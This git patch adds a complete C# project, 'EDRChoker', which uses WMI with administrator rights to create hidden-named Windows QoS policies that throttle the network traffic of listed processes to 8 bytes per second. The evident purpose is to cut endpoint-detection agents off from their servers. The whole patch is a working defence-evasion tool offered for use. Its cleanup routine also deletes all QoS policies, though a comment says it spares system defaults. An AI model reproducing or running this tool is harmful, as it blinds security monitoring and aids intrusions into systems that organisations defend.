From e103030ddd3abf0fb8867f6398d579616e5204db Mon Sep 17 00:00:00 2001
From: 2x7EQ13 <unregisteredchannel@gmail.com>
Date: Sun, 7 Jun 2026 15:48:52 +0700
Subject: [PATCH] Add project files.

---
 App.config                 |   6 ++
 EDRChoker.csproj           |  55 +++++++++++++++
 EDRChoker.sln              |  25 +++++++
 Program.cs                 | 141 +++++++++++++++++++++++++++++++++++++
 Properties/AssemblyInfo.cs |  33 +++++++++
 Utils.cs                   |  55 +++++++++++++++
 6 files changed, 315 insertions(+)
 create mode 100644 App.config
 create mode 100644 EDRChoker.csproj
 create mode 100644 EDRChoker.sln
 create mode 100644 Program.cs
 create mode 100644 Properties/AssemblyInfo.cs
 create mode 100644 Utils.cs

diff --git a/App.config b/App.config
new file mode 100644
index 0000000..193aecc
--- /dev/null
+++ b/App.config
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+    <startup> 
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
+    </startup>
+</configuration>
\ No newline at end of file
diff --git a/EDRChoker.csproj b/EDRChoker.csproj
new file mode 100644
index 0000000..e723a09
--- /dev/null
+++ b/EDRChoker.csproj
@@ -0,0 +1,55 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{C9F67410-04D8-4DBC-BFFE-23996A9986C5}</ProjectGuid>
+    <OutputType>Exe</OutputType>
+    <RootNamespace>EDRChoker</RootNamespace>
+    <AssemblyName>EDRChoker</AssemblyName>
+    <TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
+    <Deterministic>true</Deterministic>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="System" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.Management" />
+    <Reference Include="System.Xml.Linq" />
+    <Reference Include="System.Data.DataSetExtensions" />
+    <Reference Include="Microsoft.CSharp" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Net.Http" />
+    <Reference Include="System.Xml" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+    <Compile Include="Utils.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="App.config" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>
\ No newline at end of file
diff --git a/EDRChoker.sln b/EDRChoker.sln
new file mode 100644
index 0000000..f9a7d07
--- /dev/null
+++ b/EDRChoker.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.13.35825.156 d17.13
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "EDRChoker", "EDRChoker.csproj", "{C9F67410-04D8-4DBC-BFFE-23996A9986C5}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{C9F67410-04D8-4DBC-BFFE-23996A9986C5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{C9F67410-04D8-4DBC-BFFE-23996A9986C5}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{C9F67410-04D8-4DBC-BFFE-23996A9986C5}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{C9F67410-04D8-4DBC-BFFE-23996A9986C5}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {8A4A37A4-F054-4528-9933-D01DFFCD09DF}
+	EndGlobalSection
+EndGlobal
diff --git a/Program.cs b/Program.cs
new file mode 100644
index 0000000..996308a
--- /dev/null
+++ b/Program.cs
@@ -0,0 +1,141 @@
+using System;
+using System.Management;
+using System.IO;
+using EDRChoker;
+
+namespace QosPolicyExample
+{
+    class Program
+    {
+        static void Main(string[] args)
+        {
+            Utils utils = new Utils();
+            utils.ShowBanner();
+            // Verify Administrative permissions
+            if (!utils.IsRunningAsAdmin())
+            {
+                Console.WriteLine("ERROR: Elevated privileges required.");
+                return;
+            }
+            if (args.Length > 0)
+            {
+                utils.ReadCleanFile(args[0]);
+                if (utils.procName.Length == 0)
+                {
+                    Console.WriteLine("No valid process names found in the file.");
+                    return;
+                }
+                foreach (string proc in utils.procName)
+                {
+                    Console.WriteLine($"THROTTLING! Process: {proc}");
+                    CreateThrottleCurlPolicyPureWmi(proc);
+                }
+            }
+            else
+            {
+                //clear
+                Console.WriteLine("DO CLEAR...\n");
+                RemoveAllThrottleCurlPoliciesPureWmi();
+            }
+
+            //end main
+        }
+
+        
+
+
+        static void CreateThrottleCurlPolicyPureWmi(string procName)
+        {
+            try
+            {
+                var scope = new ManagementScope(@"\\.\ROOT\StandardCimv2");
+                scope.Connect();
+
+                var managementPath = new ManagementPath("MSFT_NetQosPolicySettingData");
+                var policyClass = new ManagementClass(scope, managementPath, null);
+
+                // Construct a raw, detached memory object mapping the exact schema fields
+                ManagementObject newPolicy = policyClass.CreateInstance();
+
+                newPolicy["Owner"] = 1;
+
+                string guid = Guid.NewGuid().ToString();
+                string policyName = Path.GetRandomFileName().Replace(".", "").Substring(0, 8);
+                newPolicy["Name"] = policyName;
+
+                // Use this to force the policy to be treated as a new, unique instance in the active store without conflicts
+                // this will apply the policy directly to the active store. Affect immediately
+                newPolicy["InstanceID"] = $"{guid}\\{policyName}\\ActiveStore";
+
+                newPolicy["AppPathNameMatchCondition"] = procName;
+                newPolicy["IPProtocolMatchCondition"] = 3U;      // 3 = Both TCP/UDP (uint32)
+                newPolicy["NetworkProfile"] = 0U;               // 0 = All profiles (uint32)
+
+                // 3. Throttle Actions (Matching your exact MOF structure: uint64 in Bytes per second)
+                // 8 Bits/sec
+                newPolicy["ThrottleRateAction"] = 8UL;
+
+                var putOptions = new PutOptions
+                {
+                    Type = PutType.CreateOnly
+                };
+
+                newPolicy.Put(putOptions);
+                Console.WriteLine($"SUCCESS! Policy {policyName} registered");
+            }
+            catch (ManagementException ex)
+            {
+                Console.WriteLine($"   Message   : {ex.Message}");
+                Console.WriteLine($"   ErrorCode : {ex.ErrorCode}");
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine($"\nUnexpected error: {ex.Message}");
+            }
+        }
+        //
+        static void RemoveAllThrottleCurlPoliciesPureWmi()
+        {
+            try
+            {
+                var scope = new ManagementScope(@"\\.\ROOT\StandardCimv2");
+                scope.Connect();
+
+                // Query only user-created policies (Owner = 1) to protect system defaults
+                var query = new ObjectQuery("SELECT * FROM MSFT_NetQosPolicySettingData");
+
+                using (var searcher = new ManagementObjectSearcher(scope, query))
+                using (var queryCollection = searcher.Get())
+                {
+                    if (queryCollection.Count == 0)
+                    {
+                        Console.WriteLine("No custom QoS policies found to remove.");
+                        return;
+                    }
+
+                    foreach (ManagementObject policy in queryCollection)
+                    {
+                        string policyName = policy["Name"]?.ToString() ?? "Unknown";
+                        Console.WriteLine($"REMOVING... {policyName}");
+                        // Delete the instance from the WMI repository
+                        policy.Delete();
+
+                        Console.WriteLine($"REMOVED! {policyName}");
+                    }
+                }
+            }
+            catch (ManagementException ex)
+            {
+                Console.WriteLine($"WMI Error: {ex.Message}");
+                Console.WriteLine($"ErrorCode: {ex.ErrorCode}");
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine($"Unexpected error: {ex.Message}");
+            }
+        }
+
+        //
+
+    }
+}
diff --git a/Properties/AssemblyInfo.cs b/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..152a962
--- /dev/null
+++ b/Properties/AssemblyInfo.cs
@@ -0,0 +1,33 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("EDRChoker")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("EDRChoker")]
+[assembly: AssemblyCopyright("Copyright ©  2026")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components.  If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("c9f67410-04d8-4dbc-bffe-23996a9986c5")]
+
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version
+//      Build Number
+//      Revision
+//
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/Utils.cs b/Utils.cs
new file mode 100644
index 0000000..ef4d99f
--- /dev/null
+++ b/Utils.cs
@@ -0,0 +1,55 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.IO;
+using System.Security.Principal;
+
+namespace EDRChoker
+{
+    class Utils
+    {
+        public string[] procName;
+
+        public void ReadCleanFile(string filePath)
+        {
+            try
+            {
+                procName = File.ReadLines(filePath)
+                               .Select(line => line.Trim())
+                               .Where(trimmedLine => !string.IsNullOrEmpty(trimmedLine))
+                               .ToArray();
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine($"File error: {ex.Message}");
+                procName = Array.Empty<string>();
+            }
+        }
+        public void ShowBanner()
+        {
+            Console.ForegroundColor = ConsoleColor.Cyan;
+            Console.WriteLine(@"  ___ ___  ___  ___ _  _  ___  _  _____ ___ ");
+            Console.WriteLine(@" | __|   \| _ \/ __| |_| |/ _ \| |/ / __| _ \");
+            Console.WriteLine(@" | _|| |) |   / (__|  _  | (_) | ' <| _||   /");
+            Console.WriteLine(@" |___|___/|_|_\\___|_| |_|\___/|_|\_\___|_|_\");
+
+            Console.ForegroundColor = ConsoleColor.Gray;
+            Console.WriteLine("\n  EDRChoker: You can pass, but just a little");
+
+            // Made bright using ConsoleColor.White
+            Console.ForegroundColor = ConsoleColor.White;
+            Console.WriteLine("  Two Seven One Three: x.com/TwoSevenOneT\n");
+
+            Console.ResetColor();
+        }
+
+        public bool IsRunningAsAdmin()
+        {
+            using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
+            {
+                WindowsPrincipal principal = new WindowsPrincipal(identity);
+                return principal.IsInRole(WindowsBuiltInRole.Administrator);
+            }
+        }
+    }
+}